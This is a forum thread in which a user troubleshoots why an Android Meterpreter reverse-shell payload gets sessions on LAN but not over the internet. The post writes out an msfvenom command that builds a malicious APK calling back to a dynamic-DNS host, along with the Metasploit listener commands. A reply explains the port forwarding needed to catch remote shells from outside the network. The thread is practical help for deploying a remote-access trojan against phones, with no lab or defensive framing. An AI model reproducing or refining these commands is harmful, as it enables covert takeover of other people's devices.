Forum Thread: Not Getting Meterpreter Session on WAN.

Platform: Asus ZenFone 2 Laser ZE550KL (2GB ) on Lineage 14.1
Software: Linux Deploy (Kali in installed using it), ssh client (to use chrooted environment), metasploit-framework.
Network: 4G Jio.
I have successfully got session on LAN using this device and configuration but couldn't do the same on WAN.
Command used to create payload :

"msfvenom -a dalvik --platform android -p android/meterpreter/reverse_tcp LHOST=xxx.ddns.net LPORT=3333 R -o /storage/emulated/0/qwerty.apk"

Commands for the meterpreter to listen :
"use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST my-device-ip
set LHOST 3333
exploit"
Payload starts but no session ever gets captured.

Earlier,I have tried this on pc with tethering but it didn't work (only on WAN , worked on LAN).Left that because of complexity of tethering...

Note: I tried to this to see if my system is alright:
Edited apache2 conf file to listen to desired port(say,4444) by " nano /etc/apache2/ports.conf".

Then "service apache2 start" and then used an online open port checker and it showed this port (4444,here) is open on my ddns hostname.So, I can conclude (probably) that my ISP is not blocking that port...

BUT when I set meterpreter to listen (say, on port 3333) , port remains closed on online port checker...
Thanks in advance!

2 Responses

Are you able to port forward? It is required to run reverse-tcp though WAN. Your setting up kali to listen for a connection but if your payload is sending the connection to the modem IP address, the modem needs to know where to send it to.

My best way to know if it's set up correctly, I set up the listener, check port forwarding, and then go to a web browser not on the same network and type in the IP and port used. Kali will respond with an error http request if it is working.

please help me to decide which is the ip currently allocated to Linux .... The rmnet_data0 is the ip of my mobile(same to as shown in settings -> About -> Status).(And this was the ip I used for successful session over LAN)

And in your last statement what type of error will kali throw and where?

Share Your Thoughts

  • Hot
  • Active